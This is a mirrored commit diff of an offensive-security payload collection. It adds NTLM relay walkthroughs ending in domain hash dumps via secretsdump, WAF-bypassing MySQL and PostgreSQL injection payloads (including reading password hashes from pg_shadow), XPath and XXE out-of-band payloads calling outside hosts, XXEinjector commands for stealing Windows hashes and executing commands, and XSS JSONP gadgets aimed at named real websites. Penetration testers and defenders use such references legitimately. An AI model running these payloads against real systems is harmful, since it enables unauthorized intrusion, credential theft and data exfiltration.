mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-29 15:55:25 +00:00
commit
34d8853728
Directory Traversal
Methodology and Resources
SQL Injection
Server Side Request Forgery
XPATH Injection
XSS Injection
XXE Injection
@ -144,6 +144,8 @@ c:/unattend.txt
|
||||
c:/unattend.xml
|
||||
c:/unattended.txt
|
||||
c:/unattended.xml
|
||||
c:/windows/repair/sam
|
||||
c:/windows/repair/system
|
||||
```
|
||||
|
||||
The following log files are controllable and can be included with an evil payload to achieve a command execution
|
||||
|
@ -23,6 +23,9 @@
|
||||
* [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
|
||||
* [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
|
||||
* [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
|
||||
* [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
|
||||
* [SMB Signing Disabled](#smb-signing-disabled)
|
||||
* [Drop the MIC](#drop-the-mic)
|
||||
* [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||
* [Trust relationship between domains](#trust-relationship-between-domains)
|
||||
* [Unconstrained delegation](#unconstrained-delegation)
|
||||
@ -658,12 +661,93 @@ hashcat -m 5600 -a 0 hash.txt crackstation.txt
|
||||
|
||||
### NTLMv2 hashes relaying
|
||||
|
||||
NTLMv1 and NTLMv2 can be relayed to connect to another machine.
|
||||
|
||||
| Hash | Hashcat | Attack method |
|
||||
|---|---|---|
|
||||
| LM | 3000 | crack/pass the hash |
|
||||
| NTLM/NTHash | 1000 | crack/pass the hash |
|
||||
| NTLMv1/Net-NTLMv1 | 5500 | crack/relay attack |
|
||||
| NTLMv2/Net-NTLMv2 | 5600 | crack/relay attack |
|
||||
|
||||
#### MS08-068 NTLM reflection
|
||||
|
||||
NTLM reflection vulnerability in the SMB protocolOnly targeting Windows 2000 to Windows Server 2008.
|
||||
|
||||
> This vulnerability allows an attacker to redirect an incoming SMB connection back to the machine it came from and then access the victim machine using the victim’s own credentials.
|
||||
|
||||
* https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS08-068
|
||||
|
||||
```powershell
|
||||
msf > use exploit/windows/smb/smb_relay
|
||||
msf exploit(smb_relay) > show targets
|
||||
```
|
||||
|
||||
#### SMB Signing Disabled
|
||||
|
||||
If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine.
|
||||
|
||||
1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`.
|
||||
```powershell
|
||||
[Responder Core]
|
||||
; Servers to start
|
||||
...
|
||||
SMB = Off # Turn this off
|
||||
HTTP = Off # Turn this off
|
||||
```
|
||||
2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`.
|
||||
3. Run `python Responder.py -I <interface_card>` and `python MultiRelay.py -t <target_machine_IP> -u ALL`
|
||||
4. Wait for a shell
|
||||
4. Also you can use `ntlmrelayx` to dump the SAM database of the targets in the list.
|
||||
```powershell
|
||||
ntlmrelayx.py -tf targets.txt
|
||||
```
|
||||
5. ntlmrelayx can also act as a SOCK proxy with every compromised sessions.
|
||||
```powershell
|
||||
$ ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support
|
||||
[*] Servers started, waiting for connections
|
||||
Type help for list of commands
|
||||
ntlmrelayx> socks
|
||||
Protocol Target Username Port
|
||||
-------- -------------- ------------------------ ----
|
||||
MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433
|
||||
SMB 192.168.48.230 CONTOSO/NORMALUSER1 445
|
||||
MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433
|
||||
|
||||
$ proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1
|
||||
$ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth
|
||||
```
|
||||
|
||||
#### Drop the MIC
|
||||
|
||||
> The CVE-2019-1040 vulnerability makes it possible to modify the NTLM authentication packets without invalidating the authentication, and thus enabling an attacker to remove the flags which would prevent relaying from SMB to LDAP
|
||||
|
||||
Check vulnerability with [cve-2019-1040-scanner](https://github.com/fox-it/cve-2019-1040-scanner)
|
||||
|
||||
```powershell
|
||||
python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET'
|
||||
[*] CVE-2019-1040 scanner by @_dirkjan / Fox-IT - Based on impacket by SecureAuth
|
||||
[*] Target TARGET is not vulnerable to CVE-2019-1040 (authentication was rejected)
|
||||
```
|
||||
|
||||
- Using any AD account, connect over SMB to a victim Exchange server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant DCSync privileges to the attacker account. The attacker account can now use DCSync to dump all password hashes in AD
|
||||
```powershell
|
||||
TERM1> python printerbug.py testsegment.local/testuser@s2012exc.testsegment.local <attacker ip/hostname>
|
||||
TERM2> ntlmrelayx.py --remove-mic --escalate-user ntu -t ldap://s2016dc.testsegment.local -smb2support
|
||||
TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc
|
||||
```
|
||||
|
||||
|
||||
- Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server.
|
||||
```powershell
|
||||
# create a new machine account
|
||||
TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support
|
||||
TERM2> python printerbug.py relaytest.local/testuser@second-dc-server 10.0.2.6
|
||||
TERM1> getST.py -spn host/second-dc-server.local 'relaytest.local/MACHINE$:PASSWORD' -impersonate DOMAIN_ADMIN_USER_NAME
|
||||
|
||||
# connect using the ticket
|
||||
export KRB5CCNAME=DOMAIN_ADMIN_USER_NAME.ccache
|
||||
secretsdump.py -k -no-pass second-dc-server.local -just-dc
|
||||
```
|
||||
|
||||
### Dangerous Built-in Groups Usage
|
||||
|
||||
@ -1043,3 +1127,6 @@ PXE allows a workstation to boot from the network by retrieving an operating sys
|
||||
* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592)
|
||||
* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/)
|
||||
* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf)
|
||||
* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials)
|
||||
* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/)
|
||||
* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic)
|
@ -266,6 +266,24 @@ make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(51
|
||||
|
||||
-- M@dBl00d
|
||||
(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
|
||||
|
||||
-- Zen
|
||||
+make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
|
||||
|
||||
-- Zen WAF
|
||||
(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)
|
||||
|
||||
-- ~tr0jAn WAF
|
||||
+concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0) from(information_schema./**/columns)where(table_schema=database()) and(0x00)in(@x:=Concat/*!(@x, 0x3c62723e, if( (@tbl!=table_name), Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1, 2, 0x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e), 0x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/+
|
||||
|
||||
-- ~tr0jAn Benchmark
|
||||
+concat(0x3c666f6e7420636f6c6f723d7265643e3c62723e3c62723e7e7472306a416e2a203a3a3c666f6e7420636f6c6f723d626c75653e20,version(),0x3c62723e546f74616c204e756d626572204f6620446174616261736573203a3a20,(select count(*) from information_schema.schemata),0x3c2f666f6e743e3c2f666f6e743e,0x202d2d203a2d20,concat(@sc:=0x00,@scc:=0x00,@r:=0,benchmark(@a:=(select count(*) from information_schema.schemata),@scc:=concat(@scc,0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d7265643e,LPAD(@r:=@r%2b1,3,0x30),0x2e20,(Select concat(0x3c623e,@sc:=schema_name,0x3c2f623e) from information_schema.schemata where schema_name>@sc order by schema_name limit 1),0x202028204e756d626572204f66205461626c657320496e204461746162617365203a3a20,(select count(*) from information_Schema.tables where table_schema=@sc),0x29,0x3c2f666f6e743e,0x202e2e2e20 ,@t:=0x00,@tt:=0x00,@tr:=0,benchmark((select count(*) from information_Schema.tables where table_schema=@sc),@tt:=concat(@tt,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e,LPAD(@tr:=@tr%2b1,3,0x30),0x2e20,(select concat(0x3c623e,@t:=table_name,0x3c2f623e) from information_Schema.tables where table_schema=@sc and table_name>@t order by table_name limit 1),0x203a20284e756d626572204f6620436f6c756d6e7320496e207461626c65203a3a20,(select count(*) from information_Schema.columns where table_name=@t),0x29,0x3c2f666f6e743e,0x202d2d3a20,@c:=0x00,@cc:=0x00,@cr:=0,benchmark((Select count(*) from information_schema.columns where table_schema=@sc and table_name=@t),@cc:=concat(@cc,0x3c62723e,0x3c666f6e7420636f6c6f723d707572706c653e,LPAD(@cr:=@cr%2b1,3,0x30),0x2e20,(Select (@c:=column_name) from information_schema.columns where table_schema=@sc and table_name=@t and column_name>@c order by column_name LIMIT 1),0x3c2f666f6e743e)),@cc,0x3c62723e)),@tt)),@scc),0x3c62723e3c62723e,0x3c62723e3c62723e)+
|
||||
|
||||
-- N1Z4M WAF
|
||||
+/*!13337concat*/(0x3c616464726573733e3c63656e7465723e3c62723e3c68313e3c666f6e7420636f6c6f723d22526564223e496e6a6563746564206279204e315a344d3c2f666f6e743e3c68313e3c2f63656e7465723e3c62723e3c666f6e7420636f6c6f723d2223663364393361223e4461746162617365207e3e3e203c2f666f6e743e,database/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223306639643936223e56657273696f6e207e3e3e203c2f666f6e743e,@@version,0x3c62723e3c666f6e7420636f6c6f723d2223306637363964223e55736572207e3e3e203c2f666f6e743e,user/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223306639643365223e506f7274207e3e3e203c2f666f6e743e,@@port,0x3c62723e3c666f6e7420636f6c6f723d2223346435613733223e4f53207e3e3e203c2f666f6e743e,@@version_compile_os,0x2c3c62723e3c666f6e7420636f6c6f723d2223366134343732223e44617461204469726563746f7279204c6f636174696f6e207e3e3e203c2f666f6e743e,@@datadir,0x3c62723e3c666f6e7420636f6c6f723d2223333130343362223e55554944207e3e3e203c2f666f6e743e,UUID/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223363930343637223e43757272656e742055736572207e3e3e203c2f666f6e743e,current_user/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223383432303831223e54656d70204469726563746f7279207e3e3e203c2f666f6e743e,@@tmpdir,0x3c62723e3c666f6e7420636f6c6f723d2223396336623934223e424954532044455441494c53207e3e3e203c2f666f6e743e,@@version_compile_machine,0x3c62723e3c666f6e7420636f6c6f723d2223396630613838223e46494c452053595354454d207e3e3e203c2f666f6e743e,@@CHARACTER_SET_FILESYSTEM,0x3c62723e3c666f6e7420636f6c6f723d2223393234323564223e486f7374204e616d65207e3e3e203c2f666f6e743e,@@hostname,0x3c62723e3c666f6e7420636f6c6f723d2223393430313333223e53797374656d2055554944204b6579207e3e3e203c2f666f6e743e,UUID/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223613332363531223e53796d4c696e6b20207e3e3e203c2f666f6e743e,@@GLOBAL.have_symlink,0x3c62723e3c666f6e7420636f6c6f723d2223353830633139223e53534c207e3e3e203c2f666f6e743e,@@GLOBAL.have_ssl,0x3c62723e3c666f6e7420636f6c6f723d2223393931663333223e42617365204469726563746f7279207e3e3e203c2f666f6e743e,@@basedir,0x3c62723e3c2f616464726573733e3c62723e3c666f6e7420636f6c6f723d22626c7565223e,(/*!13337select*/(@a)/*!13337from*/(/*!13337select*/(@a:=0x00),(/*!13337select*/(@a)/*!13337from*/(information_schema.columns)/*!13337where*/(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=/*!13337concat*/(@a,table_schema,0x3c666f6e7420636f6c6f723d22726564223e20203a3a203c2f666f6e743e,table_name,0x3c666f6e7420636f6c6f723d22726564223e20203a3a203c2f666f6e743e,column_name,0x3c62723e))))a))+
|
||||
|
||||
-- sharik
|
||||
(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=concat(@a,table_name,0x203a3a20,column_name,0x3c62723e))))a)
|
||||
```
|
||||
|
||||
## MYSQL Current queries
|
||||
|
@ -3,9 +3,20 @@
|
||||
## Summary
|
||||
|
||||
* [PostgreSQL Comments](#postgresql-comments)
|
||||
* [PostgreSQL version](#postgresql-version)
|
||||
* [PostgreSQL Current User](#postgresql-current-user)
|
||||
* [PostgreSQL List Users](#postgresql-list-users)
|
||||
* [PostgreSQL List Password Hashes](#postgresql-list-password-hashes)
|
||||
* [PostgreSQL List Database Administrator Accounts](#postgresql-list-database-administrator-accounts)
|
||||
* [PostgreSQL List Privileges](#postgresql-list-privileges)
|
||||
* [PostgreSQL database name](#postgresql-database-name)
|
||||
* [PostgreSQL List databases](#postgresql-list-database)
|
||||
* [PostgreSQL List tables](#postgresql-list-tables)
|
||||
* [PostgreSQL List columns](#postgresql-list-columns)
|
||||
* [PostgreSQL Error Based](#postgresql-error-based)
|
||||
* [PostgreSQL Blind](#postgresql-blind)
|
||||
* [PostgreSQL Time Based](#postgresql-time-based)
|
||||
* [PostgreSQL Stacked query](#postgresql-stacked-query)
|
||||
* [PostgreSQL File Read](#postgresql-file-read)
|
||||
* [PostgreSQL File Write](#postgresql-file-write)
|
||||
* [PostgreSQL Command execution](#postgresql-command-execution)
|
||||
@ -20,13 +31,79 @@
|
||||
/**/
|
||||
```
|
||||
|
||||
## PostgreSQL Version
|
||||
|
||||
```sql
|
||||
SELECT version()
|
||||
```
|
||||
|
||||
## PostgreSQL Current User
|
||||
|
||||
```sql
|
||||
SELECT user;
|
||||
SELECT current_user;
|
||||
SELECT session_user;
|
||||
SELECT usename FROM pg_user;
|
||||
SELECT getpgusername();
|
||||
```
|
||||
|
||||
## PostgreSQL List Users
|
||||
|
||||
```sql
|
||||
SELECT usename FROM pg_user
|
||||
```
|
||||
|
||||
## PostgreSQL List Password Hashes
|
||||
|
||||
```sql
|
||||
SELECT usename, passwd FROM pg_shadow
|
||||
```
|
||||
## PostgreSQL List Database Administrator Accounts
|
||||
```sql
|
||||
SELECT usename FROM pg_user WHERE usesuper IS TRUE
|
||||
```
|
||||
## PostgreSQL List Privileges
|
||||
|
||||
```sql
|
||||
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
|
||||
```
|
||||
|
||||
## PostgreSQL Database Name
|
||||
|
||||
```sql
|
||||
SELECT current_database()
|
||||
```
|
||||
|
||||
## PostgreSQL List Database
|
||||
|
||||
```sql
|
||||
SELECT datname FROM pg_database
|
||||
```
|
||||
|
||||
## PostgreSQL List Tables
|
||||
|
||||
```sql
|
||||
SELECT table_name FROM information_schema.tables
|
||||
```
|
||||
|
||||
## PostgreSQL List Columns
|
||||
|
||||
```sql
|
||||
SELECT column_name FROM information_schema.columns WHERE table_name='data_table'
|
||||
```
|
||||
|
||||
## PostgreSQL Error Based
|
||||
|
||||
```sql
|
||||
,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
|
||||
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
|
||||
|
||||
' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1
|
||||
' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1
|
||||
' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1
|
||||
' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1
|
||||
```
|
||||
|
||||
## PostgreSQL Blind
|
||||
@ -43,6 +120,14 @@ AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
|
||||
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
|
||||
```
|
||||
|
||||
## PostgreSQL Stacked Query
|
||||
|
||||
Use a semi-colon ";" to add another query
|
||||
|
||||
```sql
|
||||
http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));--
|
||||
```
|
||||
|
||||
## PostgreSQL File Read
|
||||
|
||||
```sql
|
||||
|
@ -440,12 +440,13 @@ SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
|
||||
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
|
||||
```
|
||||
|
||||
No Equal - bypass using LIKE/NOT IN/IN
|
||||
No Equal - bypass using LIKE/NOT IN/IN/BETWEEN
|
||||
|
||||
```sql
|
||||
?id=1 and substring(version(),1,1)like(5)
|
||||
?id=1 and substring(version(),1,1)not in(4,3)
|
||||
?id=1 and substring(version(),1,1)in(4,3)
|
||||
?id=1 and substring(version(),1,1) between 3 and 4
|
||||
```
|
||||
|
||||
Blacklist using keywords - bypass using uppercase/lowercase
|
||||
@ -461,7 +462,7 @@ Blacklist using keywords case insensitive - bypass using an equivalent operator
|
||||
```sql
|
||||
AND -> &&
|
||||
OR -> ||
|
||||
= -> LIKE,REGEXP, not < and not >
|
||||
= -> LIKE,REGEXP, BETWEEN, not < and not >
|
||||
> X -> not between 0 and X
|
||||
WHERE -> HAVING
|
||||
```
|
||||
|
@ -8,17 +8,17 @@
|
||||
* [Payloads with localhost](#payloads-with-localhost)
|
||||
* [Bypassing filters](#bypassing-filters)
|
||||
* [Bypass using HTTPS](#bypass-using-https)
|
||||
* [Bypass localhost with [::]](#bypass-localhost-with----)
|
||||
* [Bypass localhost with [::]](#bypass-localhost-with-)
|
||||
* [Bypass localhost with a domain redirection](#bypass-localhost-with-a-domain-redirection)
|
||||
* [Bypass localhost with CIDR](#bypass-localhost-with-cidr)
|
||||
* [Bypass using a decimal IP location](#bypass-using-a-decimal-ip-location)
|
||||
* [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6-ipv4-address-embedding)
|
||||
* [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6ipv4-address-embedding)
|
||||
* [Bypass using malformed urls](#bypass-using-malformed-urls)
|
||||
* [Bypass using rare address](#bypass-using-rare-address)
|
||||
* [Bypass using bash variables](#bypass-using-bash-variables)
|
||||
* [Bypass using tricks combination](#bypass-using-tricks-combination)
|
||||
* [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics)
|
||||
* [Bypass filter_var() php function](#bypass-filter-var-php-function)
|
||||
* [Bypass filter_var() php function](#bypass-filter_var-php-function)
|
||||
* [Bypass against a weak parser](#bypass-against-a-weak-parser)
|
||||
* [SSRF exploitation via URL Scheme](#ssrf-exploitation-via-url-scheme)
|
||||
* [file://](#file)
|
||||
|
@ -1,6 +1,14 @@
|
||||
# XPATH injection
|
||||
|
||||
XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
|
||||
> XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
|
||||
|
||||
## Summary
|
||||
|
||||
* [Exploitation](#exploitation)
|
||||
* [Blind exploitation](#blind-exploitation)
|
||||
* [Out Of Band Exploitation](#out-of-band-exploitation)
|
||||
* [Tools](#tools)
|
||||
* [References](#references)
|
||||
|
||||
## Exploitation
|
||||
|
||||
@ -24,16 +32,31 @@ x' or name()='username' or 'x'='y
|
||||
|
||||
## Blind Exploitation
|
||||
|
||||
```sql
|
||||
1. Size of a string
|
||||
and string-length(account)=SIZE_INT
|
||||
|
||||
```sql
|
||||
and string-length(account)=SIZE_INT
|
||||
```
|
||||
2. Extract a character
|
||||
substring(//user[userid=5]/username,2,1)=CHAR_HERE
|
||||
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
|
||||
```sql
|
||||
substring(//user[userid=5]/username,2,1)=CHAR_HERE
|
||||
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
|
||||
```
|
||||
|
||||
## Out Of Band Exploitation
|
||||
|
||||
```powershell
|
||||
http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
|
||||
```
|
||||
|
||||
## Tools
|
||||
|
||||
- [xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents
|
||||
- [xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool
|
||||
- [xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text
|
||||
- [xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer)
|
||||
- [XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool
|
||||
|
||||
## References
|
||||
|
||||
* [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
|
||||
* [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/)
|
||||
* [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
|
||||
|
@ -24,6 +24,9 @@
|
||||
#Uber.com:
|
||||
"><script+src="https://mkto.uber.com/index.php/form/getKnownLead?callback=alert(document.domain);"></script>
|
||||
#AOL/Yahoo
|
||||
"><script+src="https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?cb=alert(1337)"></script>
|
||||
"><script+src="https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337)"></script>
|
||||
"><script+src="https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback=alert(1)//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y-"></script>
|
||||
"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>
|
||||
"><script+src="https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3balert(1)%2f%2f476&_=1537149044679"></script>
|
||||
"><script+src="https://api.cmi.aol.com/content/alert/homepage-alert?site=usaol&callback=confirm(1);//jQuery20108887725116629929_1528071050373472232&_=1528071050374"></script>
|
||||
|
@ -416,6 +416,12 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu
|
||||
- Referer Header
|
||||
- Custom Site Analytics
|
||||
- Administrative Panel logs
|
||||
- User Agent
|
||||
- Custom Site Analytics
|
||||
- Administrative Panel logs
|
||||
- Comment Box
|
||||
- Administrative Panel
|
||||
|
||||
|
||||
## Polyglot XSS
|
||||
|
||||
|
@ -30,6 +30,7 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
|
||||
- [XXE inside SVG](#xxe-inside-svg)
|
||||
- [XXE inside SOAP](#xxe-inside-soap)
|
||||
- [XXE inside DOCX file](#xxe-inside-docx-file)
|
||||
- [XXE inside XLSX file](#xxe-inside-xlsx-file)
|
||||
|
||||
## Tools
|
||||
|
||||
@ -41,7 +42,31 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
|
||||
```
|
||||
$ python3 230.py 2121
|
||||
```
|
||||
|
||||
- [XXEinjector](https://github.com/enjoiz/XXEinjector)
|
||||
```bash
|
||||
# Enumerating /etc directory in HTTPS application:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl
|
||||
# Enumerating /etc directory using gopher for OOB method:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
|
||||
# Second order exploitation:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt
|
||||
# Bruteforcing files using HTTP out of band method and netdoc protocol:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc
|
||||
# Enumerating using direct exploitation:
|
||||
ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
|
||||
# Enumerating unfiltered ports:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
|
||||
# Stealing Windows hashes:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes
|
||||
# Uploading files using Java jar:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
|
||||
# Executing system commands using PHP expect:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls
|
||||
# Testing for XSLT injection:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt
|
||||
# Log requests only:
|
||||
ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt
|
||||
```
|
||||
|
||||
## Detect the vulnerability
|
||||
|
||||
@ -382,6 +407,56 @@ JPG (experimental)
|
||||
GIF (experimental)
|
||||
```
|
||||
|
||||
### XXE inside XLSX file
|
||||
|
||||
Extract the excel file.
|
||||
|
||||
```powershell
|
||||
$ mkdir XXE && cd XXE
|
||||
$ unzip ../XXE.xlsx
|
||||
Archive: ../XXE.xlsx
|
||||
inflating: xl/drawings/drawing1.xml
|
||||
inflating: xl/worksheets/sheet1.xml
|
||||
inflating: xl/worksheets/_rels/sheet1.xml.rels
|
||||
inflating: xl/sharedStrings.xml
|
||||
inflating: xl/styles.xml
|
||||
inflating: xl/workbook.xml
|
||||
inflating: xl/_rels/workbook.xml.rels
|
||||
inflating: _rels/.rels
|
||||
inflating: [Content_Types].xml
|
||||
```
|
||||
|
||||
Add your blind XXE payload inside `xl/workbook.xml`.
|
||||
|
||||
```powershell
|
||||
<xml...>
|
||||
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://YOURCOLLABORATORID.burpcollaborator.net/"> ]>
|
||||
<x>&xxe;</x>
|
||||
<workbook...>
|
||||
```
|
||||
|
||||
Rebuild the Excel file.
|
||||
|
||||
```powershell
|
||||
